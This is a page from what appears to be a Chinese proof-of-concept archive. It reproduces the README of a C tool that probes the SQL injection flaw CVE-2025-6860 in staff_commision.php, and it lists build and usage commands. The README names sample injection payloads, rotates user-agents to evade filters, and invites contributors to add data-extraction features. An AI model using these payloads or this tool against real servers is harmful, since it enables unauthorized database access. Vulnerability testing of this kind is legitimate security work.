关联漏洞
描述
A proof‑of‑concept command‑line tool in C for detecting the SQL injection vulnerability .
介绍
# CVE-2025-6860 Exploit Tool
A proof‑of‑concept command‑line tool in C for detecting (and rudimentary exploiting) the SQL injection vulnerability **CVE‑2025‑6860** in `staff_commision.php` (parameters `fromdate` & `todate`). Leverages **libcurl** for HTTP requests, rotates through common payloads & user‑agents, scans responses for SQL error patterns, and emits colorful, syscall‑driven console output.
## Features
- **Automatic payload rotation**
Tries a variety of SQL injection payloads (`' OR 1 -- -`, `admin' or '1'='1`, `-1 UNION SELECT 1`, …) against both `fromdate` and `todate`.
- **Dynamic User‑Agent cycling**
Rotates through a list of realistic browser UA strings to evade simple filters.
- **Libcurl‑powered HTTP**
Follows redirects, disables SSL verification (for testing), custom headers.
- **Low‑level syscalls for I/O**
Uses `syscall(write)` instead of `printf()` for colored & timely messaging.
- **Response analysis**
Scans server replies for 50+ SQL error signatures (MySQL, PostgreSQL, Oracle, MSSQL, OLE‑DB, ODBC, Hibernate, etc.).
- **ANSI‑colored output**
Clear success / failure / informational messages in green, blue, red.
## Prerequisites
- **gcc** (or any recent C compiler with Linux x86_64 support)
- **libcurl** development headers
- **argparse.c/h** (bundled in this repo)
On Debian/Ubuntu:
sudo apt update
sudo apt install -y build-essential libcurl4-openssl-dev
## Build :
gcc exploit.c argparse.c -o exploit -lcurl
## Usage :
./exploit -u "http://target.com/panel/staff_commision.php?fromdate=&todate="
-u, --url
Target URL template, include the base path and empty parameters.
Example :
./exploit -u "http://vulnweb.com/panel/staff_commision.php?fromdate=&todate="
If vulnerable, you’ll see:
[+] Exploitation of CVE-2025-6860 has begun...
[+] TARGET URL : http://…?fromdate=&todate=
[+] Request sent successfully!
[+] FULL URL : http://…?fromdate=' OR 1 -- -&todate=' OR 1 -- -
[+] HTTP CODE : 200
[+] A suspicious word was found in response!
[+] Keyword : You have an error in your SQL syntax
[+] The server suffers from a CVE-2025-6860 vulnerability!
On failure, it reports missing patterns or HTTP errors.
📂 File Structure :
├── exploit.c # Main exploit logic
├── argparse.c # Minimal argparse implementation
├── argparse.h # Header for argparse.c
├── README.md # This documentation
└── LICENSE # MIT License file
📝 Contribute :
Fork the repo
Add payloads / error patterns / advanced extraction features
Disclaimer: Use this tool only on systems you own or have explicit permission to test. Unauthorized scanning or exploitation is illegal.
文件快照
[4.0K] /data/pocs/e51d60bd8101bf3e79aa9314ad0fc29ab7bb5e09
├── [ 11K] argparse.c
├── [3.6K] argparse.h
├── [ 14K] exploit.c
├── [1.0K] LICENSE
└── [2.7K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。